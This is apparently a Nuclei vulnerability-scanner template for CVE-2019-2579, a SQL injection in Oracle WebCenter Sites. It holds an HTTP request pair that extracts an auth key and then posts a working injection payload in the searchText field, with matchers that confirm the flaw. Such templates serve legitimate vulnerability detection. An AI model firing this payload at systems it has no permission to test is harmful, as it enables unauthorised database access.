id: CVE-2019-2579 info: name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection author: leovalcante severity: medium description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data manipulation, or denial of service. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://github.com/Leovalcante/wcs_scanner - https://nvd.nist.gov/vuln/detail/CVE-2019-2579 - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2019-2579 epss-score: 0.00493 epss-percentile: 0.73611 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle product: webcenter_sites tags: cve,cve2019,oracle,wcs,sqli http: - raw: - | GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1 Host: {{Hostname}} - | POST /cs/ContentServer HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+ matchers-condition: and matchers: - type: word words: - "value='' and '1'='0 --" - "Use this utility to view and manage URLs" condition: and - type: status status: - 200 extractors: - type: regex name: authkey group: 1 regex: - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>" internal: true part: body # digest: 490a00463044022016bc8ca6c42a469e1bfd3ebe6391594768618698b7a9d9781ffbd31d8472e07a022001d452241772898160d54a5337da78b18c86e5d14d79e928e2944871e85ca7d0:922c64590222798bb761d5b6d8e72950